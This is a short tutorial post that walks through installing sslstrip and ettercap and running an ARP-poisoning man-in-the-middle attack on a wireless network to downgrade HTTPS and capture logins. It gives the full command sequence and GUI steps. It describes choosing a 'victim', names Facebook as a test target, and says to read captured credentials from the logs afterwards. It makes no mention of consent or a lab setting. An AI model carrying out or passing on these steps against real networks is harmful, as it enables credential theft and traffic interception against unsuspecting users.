SSL Strip
This tool provides a demonstration of the HTTPS stripping attacks that was presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
In this article i will walk you through installing SSLstrip along with ettercap and perform a MITM attack.
1) Download Ettercap with GTK
sudo apt-get install ettercap ettercap-gtk
2) Download sslstrip
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
3) Extract sslstrip
tar zxvf sslstrip-0.7.tar.gz
4) Redirect requests on port 80 (HTTP) to sslstrip running on port 10000
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
5) Verify the entry in nat table
sudo iptables --list -t nat
6) Enable forwarding
sudo echo "1" > /proc/sys/net/ipv4/ip_forward
7) Check forwarding
sudo cat /proc/sys/net/ipv4/ip_forward
You should get 1 as a reply
8) Run sslstrip logging on port 10000
sudo python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
9) Monitor the log
sudo tail -F sslstrip.log
10) Launch ettercap GUI with packet dump
sudo ettercap -G -w ~/ettercap_packets.pcap
11) Enter Unified sniffing
Sniff -> Unified sniffing
12) Select your wireless interface (this may be different than mine, check yours via 'ifconfig')
Network interface: wlan0
13) Scan for hosts
Hosts -> Scan for hosts
14) View hosts list from scan
Hosts -> Host list
15) Select targets
Highlight the victim -> Add to Target 1
Highlight the access point -> Add to Target 2
16) View added targets
Targets -> Current Targets
17) Perform arp poisoning (MITM Attack) on targets
Mitm -> Arp poisoning
You can test the stripping of SSL by browsing to a SSL supported site. http://facebook.com is a good example.
After the victim logs in, you will see the output in your sslstrip.log. Don't forget to go back with Wireshark and see if you got anything good in your ettercap_packets.pcap log.
Enjoy!
